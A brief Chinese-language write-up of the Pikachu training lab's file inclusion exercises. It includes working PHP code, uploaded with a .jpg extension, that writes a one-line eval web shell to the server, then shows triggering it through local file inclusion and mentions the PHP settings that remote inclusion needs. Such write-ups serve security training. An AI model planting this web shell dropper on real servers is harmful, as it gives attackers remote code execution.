pikachu之 File Inclusion
准备好一段创建一句话木马的php代码,后缀改为jpg
<?php
$mima="'".'ma'."'";
touch ("testshell.php");
$file = fopen("testshell.php","w");
$write='<?php @eval($_POST['.$mima.']); ?>';
echo fwrite($file,$write);
fclose($file);
echo "已经创建一句话php文件";
?>
上传到服务器,路径为http://127.0.0.1/pikachu-master/vul/unsafeupload/uploads/1.jpg
File Inclusion(local)
看一下源码,可以看到包含的方式
进行文件包含
已经在服务器创建一句话木马文件
File Inclusion(remote)
远程文件包含就是包含非本服务器上的文件,需要把php.ini文件中的allow_url_fopen和allow_url_include都设置为On,就可以包含http://xxxx/xxx/xxx/…了